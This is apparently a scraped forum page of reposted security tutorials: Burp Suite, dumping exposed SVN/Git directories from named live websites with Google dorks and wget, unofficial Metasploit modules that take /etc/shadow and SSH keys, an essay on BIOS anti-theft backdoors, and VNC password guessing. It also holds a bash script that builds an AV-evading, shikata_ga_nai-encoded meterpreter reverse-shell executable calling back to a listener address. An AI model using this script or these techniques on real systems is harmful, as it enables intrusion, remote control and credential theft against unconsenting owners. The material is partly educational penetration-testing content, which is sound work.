This aspect mainly comes in to use when there is a client side encryption of username and password in commonly used hashes or encoders. The username/password field can be selectively decoded and the contents can be viewed in clear text form. Burp Comparer Burp comparer is used when we have to compare between two sets of data. The two sets can be a comparison of responses received for two different requests. We can compare on the word scale or a byte scale. The comparison shown here is of two different requests to a website. The screen shot below shows the comparison. The comparison can be done in two ways – Bit-by-Bit comparison and word-by-word comparison. Burp automates this process for the user and compares the two requests or responses accordingly. This ends the tutorial on Burp-suite. The extent to which Burp-suite can be used can only be left to the imagination of the user. The scanner is not covered in this series because it’s not available in the free edition of Burp. In the commercial edition, the scanner module is fully functional, though with some false positives like any other application. Sursa InfoSec Institute Resources - Quick and Dirty BurpSuite Tutorial
  6. 1. Introduction We all know that when programming with a small or large team, having a revision control in place is mandatory. We can choose from a number of revision control systems. The following ones are in widespread use worldwide: CVS Was one of the first revision control systems, and is therefore very simple, but can still be used for backing up files. SVN Subversion is one of the most widespread revision control systems today. GIT Was created by Linus Torvals and its main feature is its decentralized code view. Mercurial Is very similar to Git, but somewhat faster and simpler. Bazaar Similar to Git and Mercurial, but easier. In this article we’ll take a look at a different revision control systems accessible over the HTTP/HTTPS and what we can gain from it. We all know that most revision control systems can be configured to be accessible over proprietary protocols, SSH, HTTP, etc. We also know that most of the times we need to posses the username and password to get access to the SSH protected Git for example. But HTTP/HTTPS a protocol where everything would be strictly protected by default; in HTTP/HTTPS we must intentionally protect the directory where a revision control system lives to protect it from unauthorized use. This is why we’ll take a look at what we can do with publicly accessible (over HTTP) revision control systems. 2. Getting Usable Info from SVN Repository If we Google for a string presented in the picture below, the results containing publicly available SVN revision control systems using HTTP as transport protocol are shown. The searching string first looks for “.svn” directories with title strings “Index of”. If we search with only “.svn” search criterion, only irrelevant search results are found. In the picture above we can see that the search query found two publicly accessible SVN systems: Index of /.svn Index of /.svn If we try to access one of those links, the SVN directory is presented to us as shown below: In the .svn/ directory we can see standard SVN files and folders. This usually happens because the DocumentRoot (the web page) is part of the svn repository, which also contains the folder .svn/ that is not appropriately protected. The .svn/ directory holds administrative data about that working directory to keep a revision of each of the files and folders contained in the repository, as well as other stuff. The entries file is the most important file in the .svn directory, because it contains information about every resource in a working copy directory. It keeps information about almost anything a subversion client is interested in. What happens if we try to checkout the project? We can see that in the output below: </p><p># svn co http://neo-layout.org/.svn neo </p><p>svn: Repository moved permanently to 'http://neo-layout.org/.svn/'; please relocate </p><p> We can see that we can’t checkout the project, which makes sense, because we’re trying to checkout the ./svn folder itself. We should checkout the root of the project, which is the /. If we try that, we get the output below: </p><p># svn co http://neo-layout.org/ </p><p>svn: OPTIONS of 'http://neo-layout.org': 200 OK (http://neo-layout.org) </p><p> We’re not communicating with the SVN repository, but with Apache instead: notice the 200 status OK code. We can’t really checkout the project in a normal way. But let’s not despair, we can still download the project manually by right-clicking every file and saving it on our disk or writing a command that does that automatically for us. We can do that with wget command as follows: </p><p># wget -m -I .svn http://neo-layout.org/.svn/ </p><p> This will successfully download the svn repository as can be seen here: </p><p># ls -al neo-layout.org/ </p><p>total 56 </p><p>drwxr-xr-x 3 eleanor eleanor 4096 Oct 2 16:18 . </p><p>drwxr-xr-x 75 eleanor eleanor 36864 Oct 2 16:18 .. </p><p>drwxr-xr-x 6 eleanor eleanor 4096 Oct 2 16:18 .svn </p><p>-rw-r--r-- 1 eleanor eleanor 5155 Jul 15 2011 index.html </p><p>-rw-r--r-- 1 eleanor eleanor 61 Jul 15 2011 robots.txt </p><p> The directory neo-layout.org/ was created, which contains the important directory .svn, which in turn contains the entries file. Afterward we can cd into the working directory and issue SVN commands. An example of executing svn status is shown below: </p><p># svn status </p><p>! neo.kbd </p><p>! stylesheet_ie7.css </p><p>! xkb.tgz </p><p>! de </p><p>! windows </p><p>! index_en.html </p><p>! favicon.ico </p><p>! mac </p><p>! installation </p><p>! grafik </p><p>! tastentierchen_fenster.svg </p><p>! kbdneo_ahk.exe </p><p>! svn </p><p>! neo.keylayout </p><p>! download </p><p>! portabel </p><p>! bsd </p><p>! kbdneo32.zip </p><p>! neo_portable.zip </p><p>! installiere_neo </p><p>! neo-logo.svg </p><p>! neo_portable.tar.gz </p><p>! chat </p><p>! tastentierchen_pingu.svg </p><p>! stylesheet.css </p><p>! neo.html </p><p>! tastentierchen_apfel.svg </p><p>! Compose.neo </p><p>! forum </p><p>! neo_kopf_trac_522x50.svg </p><p>! neo_de.xmodmap </p><p>! XCompose </p><p>! linux </p><p>! neo20.exe </p><p>! stylesheet_wiki.css </p><p>! portable </p><p>! kbdneo64.zip </p><p> The first column in the output above indicates whether an item was added, deleted or otherwise changed. We can get a whole list of supported characters that indicate file status here. All of the listed files are missing, because we didn’t really checkout the repository but downloaded it with wget. But nevertheless we found out quite a lot about the actual files residing in the repository. Hm, maybe those files are actually accessible in the Apache DocumentRoot directory. Let’s try to access stylesheet_ie7.css which should be present. In the picture above we can see the representation of file stylesheet_ie7.css, which is indeed present in the DocumentRoot. We could have bruteforced the name of that file with DirBuster, but this is indeed easier and more accurate. We can try to download other files as well, which might provide us with quite more intel. Let’s also try to run svn update: # svn update svn: Unable to open an ra_local session to URL svn: Unable to open repository 'file:///sol/svn/neo/www' We were of course unable to execute that command successfully, but something interesting popped up. The name of the folder which holds the actual repository is /sol/svn/neo/www. The svn info command provides additional information about the repository: </p><p># svn info </p><p>Path: . </p><p>URL: file:///sol/svn/neo/www </p><p>Repository Root: file:///sol/svn/neo </p><p>Repository UUID: b9310e46-f624-0410-8ea1-cfbb3a30dc96 </p><p>Revision: 2429 </p><p>Node Kind: directory </p><p>Schedule: normal </p><p>Last Changed Author: martin_r </p><p>Last Changed Rev: 2399 </p><p>Last Changed Date: 2011-06-25 10:56:02 +0200 (Sat, 25 Jun 2011) </p><p> Notice the author and the last changed revision number and last changed date. That’s quite something. 3. Getting Usable Info from GIT Repository This is inherently the same as with SVN repositories, but let’s discuss the Git repositories a little further. We can use the same search query “.git” with “intitle: index of”, which will search for all indexed .git repositories online. The picture below shows such a query made against Google search engine: Among many of the publicly accessible .git repositories, the following two were the first ones: Index of /.git www.bjphp.org/.git/ Let’s again try to checkout the repository. We can do that with the git clone command as shown below: </p><p># git clone http://www.claytonking.com/.git/ </p><p>Cloning into 'www.claytonking.com'... </p><p>fatal: http://www.claytonking.com/.git/info/refs not valid: is this a git repository? </p><p> We are again not successful in cloning the repository, because of the same reason as with SVN repositories, the actual repository is the Apache DocumentRoot directory. If we try to clone from that repository we’re not successful: </p><p># git clone http://www.claytonking.com/ </p><p>Cloning into 'www.claytonking.com'... </p><p>fatal: http://www.claytonking.com/info/refs not valid: is this a git repository </p><p> Nevermind, we’ll use the same approach as we did with SVN repositories: with wget command as follows: </p><p> wget -m -I .git http://www.claytonking.com/.git/ </p><p>--2012-10-02 16:59:25-- http://www.claytonking.com/.git/ </p><p>Resolving www.claytonking.com... 174.143.64.58 </p><p>Connecting to www.claytonking.com|174.143.64.58|:80... connected. </p><p>HTTP request sent, awaiting response... 200 OK </p><p>Length: 249 1 </p><p>Saving to: `www.claytonking.com/.git/index.html' </p><p> </p><p>100%[===================================================================================================================================================================>] 249 --.-K/s in 0s </p><p> </p><p>Last-modified header missing -- time-stamps turned off. </p><p>2012-10-02 16:59:25 (27.6 MB/s) - `www.claytonking.com/.git/index.html' saved [249/249] </p><p> </p><p>FINISHED --2012-10-02 16:59:25-- </p><p>Total wall clock time: 0.3s </p><p>Downloaded: 1 files, 249 in 0s (27.6 MB/s) </p><p> The wget command failed to download the .git directory. Why? We can quickly find out that access to that directory is denied as can be seen in the picture below: So that repository is properly secured against our attack. Let’s try another repository located at Index of /.git. If we try to open it in a web browser, it opens up successfully, which means that the wget command will also succeed. The following picture presents accessing the .git/ repository at host www.bjphp.org: To download the repository we can execute the following command: </p><p># wget -m -I .git http://www.bjphp.org/.git/ </p><p> Once the repository is downloaded, we can cd into it and issue git commands. Note that the repository is quite big, so it will take some time to be fully downloaded. If we try to execute git status we get an error about a bad HEAD object: </p><p># git status </p><p>fatal: bad object HEAD </p><p> But we should be able to execute git status command, since all the information is contained in the .git/ folder. First we need to correct the HEAD pointer to point to the latest commit. We can do that by changing the .git/refs/heads/master and replacing the non-existing hash with an existing one. All the hashes can be found by executing the command below: </p><p># find .git/objects/ </p><p>... </p><p>.git/objects/2f/e5c0f9c7ca304f0e32c40df8c3d0ca17d3fa51 </p><p>.git/objects/2f/99dae8e6ef73e91a5d6283d2a732b6372d5e27 </p><p>.git/objects/2f/1d58759d8640c62ad5fe0a4778a9474dc8abcc </p><p>.git/objects/2f/48ccd102e392b27af0301078d90abf0bced7d0 </p><p>.git/objects/2f/e318d9a6305702a7555859acedcec549371534 </p><p>.git/objects/2f/index.html </p><p>.git/objects/2f/86f0ae6bb797bf29700cb1d0d93e5e30a4e72b </p><p> The output was truncated, but we can still see six hashes that we can use. Let’s put the last hash 86f0ae6bb797bf29700cb1d0d93e5e30a4e72b into the .git/refs/heads/master file and then execute the git status command: </p><p># git status | head </p><p># </p><p># Initial commit </p><p># </p><p># Changes to be committed: </p><p># (use "git rm --cached <file>..." to unstage) </p><p># </p><p># new file: mainsite/.files.list </p><p># new file: mainsite/index.php </p><p># new file: mainsite/license.txt </p><p># new file: mainsite/readme.html </p><p> The command obviously succeeded, it printed the modified, added, and deleted files at a point of the 86f0ae6bb797bf29700cb1d0d93e5e30a4e72b commit. Nevertheless we can find out that the site is running WordPress and all of the filenames are also printed. Afterward we can easily find out the name of the plugins the website is using with the command below: </p><p># git status | grep "wp-content/plugins" | sed 's/.*wp-content\/plugins\/\([^\/]*\).*/\1/' | sort | uniq | grep -v ".php" </p><p>akismet </p><p>easy-table </p><p>facebooktwittergoogle-plus-one-share-buttons </p><p>jetpack </p><p>websimon-tables </p><p> We could have written a better sed query, but it works for our example. If we try to access one of the listed files in web browser, we can see that the files are indeed accessible as can be seen below: 4. Conclusion We’ve seen how to pull various information from SVN and GIT repositories, but we could easily have done the same with other repository types. Having a repository publicly accessible can even lead to a total website defacement if a certain filename is found that contains all the passwords that are accessible via the web browser. To protect ourselves we should never leave unprotected .git/ repositories online for everyone to see. We should at least write a corresponding .htaccess file to provide at least some protection. Sursa InfoSec Institute Resources - Hacking SVN, GIT, and MERCURIAL
  7. Introduction I guess we all know what Metasploit is, so we don’t really need to present to the reader the basics of Metasploit. But it’s still useful if we present the type of modules the Metasploit has. Metasploit has the following types of modules: Auxiliary Modules: perform scanning and sniffing and provide us with tons of information when doing a penetration test. Post Modules: gather more information or obtain more privileges on an already compromised target machine. Encoders: used to encode the payload being used for it to not be detected by the anti-virus software programs. Exploits: used to actually exploit a specific host. Payloads: are the actual instructions that will be executed on the target host. Payloads can be divided between singles that can be used standalone, like adding a user to the system. There are also stager payloads, that usually set-up a network connection between the victim and attacker and the stages payloads that are downloaded by the stager payloads. The stagers and stages provide execution of multiple payload stages that can be used whenever we don’t have enough space to use within certain vulnerability, but would still like to execute a certain payload on the target system. Q on Github The Q Metasploit Exploit Pack is a collection of modules gathered across time, which were not accepted into the main Metasploit trunk. Currently the Q trunk only contains two auxiliary modules and four post modules, which we’ll look into in the rest of the article. To use the Q exploit modules, we could download the individual modules manually and include them in the system’s Metasploit modules path, but there’s a better way. First we need to clone the repository as follows: </p><p># git clone https://github.com/mubix/q.git </p><p> Afterwards, the q/ directory will be created to hold all the files and folders in the git repository. We can copy the q/modules/ directory under the ~/.msf4/modules directory and run msfconsole command, which will load system modules as well as user defined modules. Alternatively we could load the modules by using the -m option with msfconsole, which would also load all the system as well as user modules. Another option of loading the directory is by using the loatpath /path/to/modules command when the msfconsole is already running. In our case we copied the modules to the ~/.msf4/modules/ directory and run msfconsole as follows: </p><p># msfconsole4.4 </p><p>[-] WARNING! The following modules could not be loaded! </p><p>[-] /root/.msf4/modules/post/linux/q/passwd-shadow-ssh-jacker-shell.rb: SyntaxError compile error </p><p>/root/.msf4/modules/post/linux/q/passwd-shadow-ssh-jacker-shell.rb:76: syntax error, unexpected $end, expecting kEND </p><p>[-] /root/.msf4/modules/auxiliary/gather/netcrafting.rb: SyntaxError compile error </p><p>/root/.msf4/modules/auxiliary/gather/netcrafting.rb:69: syntax error, unexpected ')' </p><p> </p><p> ______________________________________________________________________________ </p><p>| | </p><p>| 3Kom SuperHack II Logon | </p><p>|______________________________________________________________________________| </p><p>| | </p><p>| | </p><p>| | </p><p>| User Name: [ security ] | </p><p>| | </p><p>| Password: [ ] | </p><p>| | </p><p>| | </p><p>| | </p><p>| [ OK ] | </p><p>|______________________________________________________________________________| </p><p>| | </p><p>|______________________________________________________________________________| </p><p> </p><p> </p><p> </p><p> =[ metasploit v4.4.0-release [core:4.4 api:1.0] </p><p>+ -- --=[ 903 exploits - 492 auxiliary - 153 post </p><p>+ -- --=[ 250 payloads - 28 encoders - 8 nops </p><p> </p><p>msf > </p><p> After that, we should be able to load modules present in the Q exploit pack just fine. The Ripecon Module An example of loading the auxiliary module ripecon.rb in category gather is presented below: </p><p>msf > use auxiliary/gather/ripecon </p><p>msf auxiliary(ripecon) > show options </p><p> </p><p>Module options (auxiliary/gather/ripecon): </p><p> </p><p> Name Current Setting Required Description </p><p> ---- --------------- -------- ----------- </p><p> KEYWORD yes Keyword you want to search for (ex. Microsoft, Google) </p><p> OUTFILE no A filename to store the results of the module </p><p> Proxies no Use a proxy chain </p><p> RHOST 193.0.6.142 yes The IP address of the RIPE apps server </p><p> RIPE-GRSSEARCH-URI /whois/grs-search yes Path to the RIPE webservice </p><p> RIPE-SEARCH-URI /whois/search yes Path to the RIPE GRS webservice </p><p> RPORT 443 yes Default remote port </p><p> VHOST apps.db.ripe.net yes The host name running the RIPE webservice </p><p> We can use the ripecon module to query the apps.db.ripe.net database to get more information about a certain company. Let's set the keyword to Google and run the module: </p><p>msf auxiliary(ripecon) > run </p><p> </p><p> [*] RIPEcon: Retrieving sources... </p><p> [*] Standard search results: </p><p>[-] https://apps.db.ripe.net:443/whois/search?source=ripe&source=apnic&source=afrinic&source=test& - Failed to connect or invalid response </p><p> [*] GRS search result: </p><p> </p><p>Query Results </p><p>============= </p><p> </p><p> Name Value </p><p> ---- ----- </p><p> descr "Google" LLC </p><p> inetnum 108.170.192.0 - 108.170.255.255 </p><p> inetnum 108.177.0.0 - 108.177.127.255 </p><p> descr 12-05894 </p><p> inetnum 142.250.0.0 - 142.251.255.255 </p><p> descr 1600 Amphitheatre Parkway </p><p> inetnum 172.217.0.0 - 172.217.255.255 </p><p> inetnum 173.194.0.0 - 173.194.255.255 </p><p> inetnum 193.120.166.64 - 193.120.166.127 </p><p> inetnum 195.100.224.112 - 195.100.224.127 </p><p> inetnum 195.76.16.136 - 195.76.16.143 </p><p> inetnum 199.87.241.32 - 199.87.241.63 </p><p> inetnum 207.223.160.0 - 207.223.175.255 </p><p> inetnum 209.85.128.0 - 209.85.255.255 </p><p> inetnum 212.179.82.48 - 212.179.82.63 </p><p> inetnum 212.21.196.24 - 212.21.196.31 </p><p> inetnum 213.248.112.64 - 213.248.112.127 </p><p> inetnum 213.253.9.128 - 213.253.9.191 </p><p> inetnum 216.239.32.0 - 216.239.63.255 </p><p> inetnum 216.58.192.0 - 216.58.223.255 </p><p> inetnum 217.163.1.64 - 217.163.1.127 </p><p> inetnum 46.61.155.0 - 46.61.155.255 </p><p> inetnum 64.233.160.0 - 64.233.191.255 </p><p> inetnum 66.102.0.0 - 66.102.15.255 </p><p> inetnum 66.249.64.0 - 66.249.95.255 </p><p> inetnum 70.32.128.0 - 70.32.159.255 </p><p> inetnum + - 70.90.219.55 </p><p> inetnum 70.90.219.72 - 70.90.219.79 </p><p> inetnum 72.14.192.0 - 72.14.255.255 </p><p> inetnum 74.125.0.0 - 74.125.255.255 </p><p> inetnum 80.239.142.192 - 80.239.142.255 </p><p> inetnum 80.239.168.192 - 80.239.168.255 </p><p> inetnum 80.239.174.64 - 80.239.174.127 </p><p> inetnum 80.239.229.192 - 80.239.229.255 </p><p> inetnum 89.175.162.48 - 89.175.162.55 </p><p> inetnum 89.175.165.0 - 89.175.165.15 </p><p> inetnum 89.175.35.32 - 89.175.35.47 </p><p> inetnum 92.45.86.16 - 92.45.86.31 </p><p> inetnum 95.167.107.32 - 95.167.107.63 </p><p>… </p><p> [*] Auxiliary module execution completed </p><p> We can see that we’ve gotten quite some information about the Google netblock, but there are also entries in there that do not belong to Google. We can get the same information if we visit the webpage apps.db.ripe.net and click on the “Query” and “Full Text Search (GRS)” links in the menu on the right side of the page. We can see that in the picture below: The NetcRafting Module This modules provides us with results for all the sites, it’s netblock where the site belongs to and the operating system running that web site. All we need to do is enter the company name in a variable KEYWORD and run the module. It will automatically return the results as shown below: </p><p>msf > use auxiliary/gather/netcrafting </p><p>msf auxiliary(netcrafting) > set KEYWORD Google </p><p>KEYWORD => Google </p><p>msf auxiliary(netcrafting) > run </p><p> </p><p> [*] NetcRafting results: </p><p> </p><p>Query Results </p><p>============= </p><p> </p><p>Site Netblock OS </p><p>---- -------- – </p><p>www.google.com google inc. linux </p><p>www.google.de google inc. linux </p><p>www.google.it google inc. linux </p><p>www.google.fr google inc. linux </p><p>www.google.co.uk google inc. linux </p><p>www.google.pl google inc. linux </p><p> We had set the KEYWORD variable to Google to get the information about Google. The results have been trimmed for clarity, but we can nevertheless see that the NetcRafting module returned the sites that belong to Google. The returned sites are: www.google.com, www.google.de, www.google.it, www.google.fr, www.google.co.uk and www.google.pl, which all run the operating system Linux. We can get the same result if we visit the webpage netcraft and search for a keyword Google as can be seen in the picture below: There are more than 300 entries, but only seven of them have been shown in the picture above. With this query we can get more information about the domain names the company is using as well as their operating systems and the time when they have first been seen on the Internet (although this is only available on the online version of the search query, and not in a Metasploit module). The Passwd-shadow-ssh-jacker-meterpreter Module This is a post exploitation module that can be used on Linux systems when the session to the target machine is already set-up. It tries to download /etc/passwd, /etc/shadow and SSH keys from the target machine. It automatically finds the .ssh folder and tries to download the keys in it, but it might not be successful, because the user the session is running under might not have enough permissions. I guess this module is there just for convenience, because if we already have a session open, we can download those files manually with ease. An example of showing the options the module uses can be seen in the output below: </p><p>msf > use post/linux/q/passwd-shadow-ssh-jacker-meterpreter </p><p>msf post(passwd-shadow-ssh-jacker-meterpreter) > show options </p><p> </p><p>Module options (post/linux/q/passwd-shadow-ssh-jacker-meterpreter): </p><p> </p><p> Name Current Setting Required Description </p><p> ---- --------------- -------- ----------- </p><p> SESSION yes The session to run this module on. </p><p> The Openvpn_profiles_jack Module This module is a post exploitation module that can be run on Windows. It can download OpenVPN profiles that can be imported into the OpenVPN client. This module can be used when we already have an open session, which we can interact with. I guess if we already have a session we can also do this manually with ease, so additional module is there just to make things a little easier. An example of using and showing options the module accepts can be seen below: </p><p>msf > use post/windows/q/openvpn_profiles_jack </p><p>msf post(openvpn_profiles_jack) > show options </p><p> </p><p>Module options (post/windows/q/openvpn_profiles_jack): </p><p> </p><p> Name Current Setting Required Description </p><p> ---- --------------- -------- ----------- </p><p> SESSION yes The session to run this module on. </p><p> Conclusion We’ve seen how the Q exploit pack for Metasploit can be used together with Metasploit to provide additional modules that didn’t make it into the Metasploit trunk. Currently it contains very few modules, but in time this should change if the modules will not be accepted as part of the Metasploit trunk. Whenever we’re writing a module to automate something with Metasploit or write an entirely new Metasploit module, we first need to contact the Metasploit developers to find out if the module is eligible to be included into the Metasploit trunk. Otherwise, we should add it to the Q exploit pack to make all the non-accepted modules part of the same repository. Sursa InfoSec Resources - A Collection of Metasploit Modules Not Accepted to Main Trunk for Various Legal Reasons
  8. 1. Introduction In 2006, a laptop containing personal and health data of 26,500,000 veterans was stolen from a data analyst working for the US Department of Veterans Affairs. The data contained the names, dates of birth, and some disability ratings of the veterans. It was estimated that the process of preventing and covering possible losses from the theft would cost between USD 100 million and USD 500 million. One year later, a laptop used by an employee of the UK’s largest building society was stolen during a domestic burglary. The laptop contained details of 11 million customers’ names and account numbers. The information was unencrypted. Subsequently, the UK’s largest building society was fined with GBP 980,000 by the Financial Services Authority (FSA). The reason for the fine was failing to have effective systems and controls to manage its information security risks. From these two examples, it can be inferred that laptop theft is a serious problem that concerns both businesses and individuals. Victims of laptop theft can lose not only their software and hardware, but also sensitive data and personal information that have not been backed up. The current methods to protect the data and to prevent theft include alarms, anti-theft technologies utilized in the PC BIOS, laptop locks, and visual deterrents. This article is focused on the BIOS anti-theft technologies. It starts with an overview of these technologies (Section 2). Next, the work discusses the legal (Section 3) and technological problems (Section 4) arising from the use of BIOS anti-theft technologies. Then, it recommends solutions to those problems (Section 5). Finally, a conclusion is drawn (Section 6). 2. Overview of BIOS anti-theft technologies BIOS anti-theft technologies are embedded in the majority of laptops sold on the market. They consist of two components, namely, an application agent and a persistence module. The application agent is installed by the user. It periodically provides device and location data to the anti-theft technology vendor. In case a laptop containing an installed application agent is stolen, the anti-theft technology vendor connects to the application agent with the aims of determining the location of the computer and deleting the data installed on the laptop. Upon a request of the owner of the laptop, the anti-theft technology may permanently erase all data contained on the magnetic media. In order to make sure that the data have been deleted property, some anti-theft technology vendors overwrite the data sectors of the deleted files. The persistence module is embedded in the BIOS of most laptops during the manufacturing process. The BIOS is the code running when the computer is powered on. It initialises chipset, memory subsystem, devices and diagnostics. The BIOS is also referred to as firmware. The persistence module is activated during the first call of the application agent to the anti-theft technology vendor. The persistence module restores the application agent if it has been removed. For instance, in case a thief steals a computer and reinstalls the operating system, the persistence module will restore the agent. It should be noted that, until the application agent is installed by the user, the persistence module remains dormant. Even if the BIOS is flashed, a persistence module that has been enabled will continue restoring the application agent. This is because the persistence module is stored in a part of the BIOS that cannot be flashed or removed. 3. Legal issues Principally, if the buyer of a laptop agrees with the installation of an application agent on her computer, there is nothing illegal in the use of anti-theft technologies. However, in some cases, a seller of a laptop may either accidentally activate the application agent before sending it out or sell to the buyer a machine that was originally meant for a customer who ordered a computer with an installed application agent. When an application agent is installed without the consent of the user, it falls into the scope of the definition of backdoor. Backdoor is a program that gives a remote, unauthorized party complete control over a system by bypassing the normal authentication mechanism of that system. The application agent is not the first case of a backdoor not specifically designed to damage and/or disrupt a system. In April of 2000, several e-commerce websites discovered that their Cart32 shopping card software contained a backdoor password enabling any user to obtain a listing of the passwords of every authorized user on the system. The purpose of the backdoor was to enable technical support personnel to recover the users’ passwords. Because the backdoor password was embedded in the program code itself, anyone with access to the software could exploit it undetectably. The activation of an application agent without the consent of the user infringes most privacy laws around the world. In order to stop the violation of their privacy rights, the affected users may submit a request to the anti-theft vendor for the purpose of removing the application agent from their computers and have recourse to a court. Actually, an affected user often does not know that the application agent is installed on its computer. This is because the agent is very difficult to detect. It runs as a non-descript service and is not listed as an application. The agent does not appear on the programs menu listing or as a system tray icon. In relation to the submission of a request for removal of the content to the anti-theft technology vendor, it should be noted that a number of unsatisfied users complained in online forums because of anti-theft technology vendors’ failure to respond in time to their questions and requests to have the application agent removed. For example, a user complains that, despite sending more than five emails to the company producer of his laptop and the anti-theft technology vendor, he did not receive a reply on his request to remove the application agent from his computer. He was not able to reach them even after several phone calls. 4. Technology issues In 2009, security researchers Anibal Sacco and Alfredo Ortega published an article stating that the implementation of an application agent of a particular vendor embedded in the BIOS has security vulnerabilities. These vulnerabilities can be used for insertion ofadangerous form of BIOS-enhanced rootkit that can bypass all chipset or installation restrictions and reutilize the existing features offered by an anti-theft technology. Rootkit is a software or code that allows a persistent undetectable presence on a computer. The BIOS is the best place that a rootkit can attack because it survives reboots and power cycles, leaves no trace on disk, survives and re-infects re-installations of same operation system (OS), survives and re-infects re-installations of a new OS, and is difficult to detect and remove. The capabilities of a BIOS rootkit can be seen from an experimental rootkit for desktop computers developed by researchers from Microsoft and University of Michigan. The rootkit, called SubVirt, can survive hard disk replacement and OS reinstallation. Because it can modify the boot sequence and loads itself before the OS, it can operate outside the OS and remain hidden from many anti-virus programs. Moreover, by using hardware virtualization technology from CPU manufacturers, SubVirt is able to load the original OS as a virtual machine and intercept the OS’s calls to hardware. It should be reminded that use of BIOS embedded rootkits in mobile devices is not a new phenomenon. In October 2008, criminals in Europe inserted rootkits in a credit card-reading machines while they were still in the supply-chain. The compromised card-reading devices continued to function like normal credit card readers with the exception that they copied customer’s credit card information and transmitted it to criminals via a cell phone network. The only way to remove the toolkit was to flash (rewrite) the BIOS with a known clean copy, delete the hard drive, and reload the OS from clean installation media. In relation to the use of anti-theft technologies, a question arises as to whether the protection against thieves deserves paying the high price of having a low-level information security. In this regard, it should be pointed out that an unauthorized access to a computer system can be as disturbing as a theft of a laptop. 5. Solutions 5.1 Solutions to legal problems caused by anti-theft technologies Pertaining to the legal issues arising from the use of anti-theft technologies, this article recommends four solutions. Firstly, anti-theft technology vendors should guarantee that the application agent is not accidentally activated. This can be done, for instance, by adopting a policy of activating the application agent only after receiving a written consent from the user. Secondly, measures should be taken to ensure that machines meant for a customer who ordered a computer with an installed application agent are not resold to a customer who has not agreed with the installation of the agent. Such measures may include additional checks before selling laptops to customers. Thirdly, a user who activated the application agent should be regularly informed about the presence of the agent. This will give the users an opportunity to unsubscribe if the agent is installed incidentally. The dissatisfaction of the users with regard to incidentally installed application agents can be seen from the following excerpts of a comment posted in an internet forum: “I have a new laptop, and never paid for a subscription. I didn’t even know I had their damned spyware installed in my BIOS (or in whatever other piece of hardware it is). I’ve never even been invited to subscribe. Yet my firewall one fine day warned me that rpcnet.exe was trying to access the net. I googled it, and that’s how I know what it is. Don’t believe them if they say it “lies dormant” until activated with a subscription. I personally caught it talking to them. Do not believe them when they say they have deactivated it.” Fourthly, anti-theft technology vendors should provide the users with a way to check whether the application agents are installed on their computers. At present, it is difficult for a layman to establish whether the application agent has been activated. 5.2 Solutions to technological problems caused by the use of anti-theft technologies Concerning the technological problems related to the use of anti-theft technologies, this article recommends to the producers of BIOS anti-theft technologies that they put more effort in order to eliminate the vulnerabilities found by Anibal Sacco and Alfredo Ortega. Instead of responding by press releases containing statements that avoid discussion of the actual findings of the researchers, it would be better if the anti-theft technology vendors present technical facts indicating that the findings of the researchers are wrong, patching the problem, or offering any updates to fix the issue. 6. Conclusions According to the statistics, 1 of every 10 laptops is stolen or lost. A Gartner Group report notes that one laptop is stolen every 53 seconds in the United States. BIOS anti-theft technologies make the retrieving of a lost or stolen laptop possible. All that’s needed is a little luck and the foresight to enable or install the application agent. However, this article has shown that, apart from benefits, anti-theft technologies have two major drawbacks. The first drawback is that the privacy rights of the users are infringed when the application agent is activated without the consent of the user. The information security vulnerabilities of these technologies constitute the second drawback. These drawbacks were noticed by both security researchers and the users of laptops. In the modern era of privacy conscious societies, it should not come as a surprise that laptop users want to ensure that their personal information will not be shared without their consent and that their machines are as secure as possible. Sursa InfoSec Institute Resources - Legal and Technological Concerns Regarding the Use of BIOS Anti-theft Technologies
  9. This script will create an executable file which it will listen in 3 different ports and it will be encoded with the shikata_ga_nai encoder.Of course it can be used also to create different file extensions like .vba etc automatically.You can see the source code of the script below. #!/bin/bash # Simple builder LHOST="192.168.91.135" LPORTS="4444 5555 6666" rm -fr /tmp/msf.raw rm -fr /tmp/msf1.raw echo "Building…" echo -n "Port: `echo $LPORTS | cut -d " " -f 1`" echo "" msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=$LHOST LPORT=`echo $LPORTS | cut -d " " -f 1` exitfunc=thread > /tmp/msf.raw for LPORT in `echo $LPORTS` do echo -n "Port: $LPORT" echo "" msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=$LHOST LPORT=$LPORT exitfunc=thread -c /tmp/msf.raw > /tmp/msf1.raw cp /tmp/msf1.raw /tmp/msf.raw done # Change option –f exe to –f vba in order to create a vba file msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai LHOST=$LHOST LPORT=$LPORT exitfunc=thread -c /tmp/msf1.raw > msf.exe rm -fr /tmp/msf.raw rm -fr /tmp/msf1.raw echo -n "Done!" Original Author: Michele
  10. Often in infrastructure penetration tests especially in large organizations you might come across with the VNC service.The main use of this service is because systems administrators want to remotely control other systems or for technical support issues in the users desktops.So when a penetration tester discovers a VNC server running on port 5900 then it is a good practice to check if he could gain access to the system from that service by checking for weak passwords.In this tutorial we will see how we can attack a VNC server. So lets say that we have discover a VNC service running on port 5900 through our nmap scan. [VNC Service Discovery] Now we can use the metasploit framework in order to attack this service.The module that we will need is the vnc_login.Unfortunately metasploit doesn’t provide a big word-list for this module so we might want to use an alternative word-list in order our attack to have more efficiency.So we are configuring the module and we are executing it with the run command. [VNC Authentication Scanner] As we can see from the image above the vnc scanner has managed to authenticate with the password admin.So now we can use the VNC viewer in order to authenticate with the remote host and to start the post exploitation activities. Conclusion VNC is a service that it can be seen quite often in networks.As we saw the metasploit module is simple and effective and it can be used for testing this service.Metasploit offers of course and other modules that can exploit VNC vulnerabilities but in order to use these modules it is advisable first to be in contact with the client that the penetration test is performed. Sursa Penetration Testing Lab
  11. Le`am raportat de pe mailuri diferite, nu stiam ca merg "merged" oricum.
  12. http://www.youtube.com/watch?v=l7lA32UKm3U&feature=g-u-u
  13. La mine, la 10 zile dupa ce am primit instiintarea ca vulnerabilitatea este eligibila pentru recompensa, am completat supplier enrollment (cu greu, prima data lipsea Romania, a 2a oara 500 Internal Server Error). Apoi am trimis un mail la p2phelp pentru a intreba daca totul a fost in regula. Mi`au raspuns ca lipseste SWIFT Code. I l`am trimis unei tipe Anita, pe mailul dat de ei dadea un futai de eroare. Tipia mi`a comfirmat ca totul e ok, Romanian Books Sange. Noaptea trecuta am mai trimis un mail tot tipei aleia sa o intreb daca are ceva noutati pentru ca a trecut o luna si cateva zile. Acum astept. Intre timp am mai luat 200$ pe doua xss-uri, acum doua zile am completat supplier enrollment pentru ele. Daca or sa dureze la fel de mult si cu probleme, vai si-amar.
  14. dafuq? Acum ar trebui sa mearga.
